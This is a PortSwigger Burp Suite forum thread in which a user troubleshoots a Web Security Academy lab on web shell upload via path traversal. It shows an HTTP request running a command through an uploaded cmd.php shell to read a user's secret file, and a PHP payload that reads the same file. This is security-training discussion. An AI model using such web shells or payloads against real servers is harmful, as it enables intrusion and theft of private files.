Research Academy
My account Customers About Blog Careers Legal Contact Resellers
The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTER DISCORD

Lab: Web shell upload via path traversal | Correct answer is wrong?

Kostiantyn | Last updated: Aug 19, 2024 12:29PM UTC

Request: GET /files/cmd.php?cmd=cat+/home/carlos/secret HTTP/2 Host: 0a9600c004a6188d80a8bdb500860051.web-security-academy.net Cookie: session=MS2htmTGD9xkK2AK907aZFLSnR7mdeBV User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:129.0) Gecko/20100101 Firefox/129.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: none Sec-Fetch-User: ?1 Priority: u=0, i Te: trailers Response: HTTP/2 200 OK Date: Mon, 19 Aug 2024 12:22:41 GMT Server: Apache/2.4.41 (Ubuntu) Content-Type: text/html; charset=UTF-8 X-Frame-Options: SAMEORIGIN Content-Length: 64 oIIMzytdRxRSkCLpFB2Z5LscSbr8Xvt3oIIMzytdRxRSkCLpFB2Z5LscSbr8Xvt3 After submit: That answer is incorrect, please try again!

Kostiantyn | Last updated: Aug 19, 2024 12:29PM UTC

Also had same problems with other File upload labs.

Kostiantyn | Last updated: Aug 19, 2024 12:34PM UTC

Oh, I get it. For some reason it duplicates the answer with webshell. Payload "<?php echo file_get_contents('/home/carlos/secret'); ?>" works as intended. Not sure if that's a bug, however, I'm sure it did not work like this with shells before. Have a nice day.

Ben, PortSwigger Agent | Last updated: Aug 19, 2024 12:53PM UTC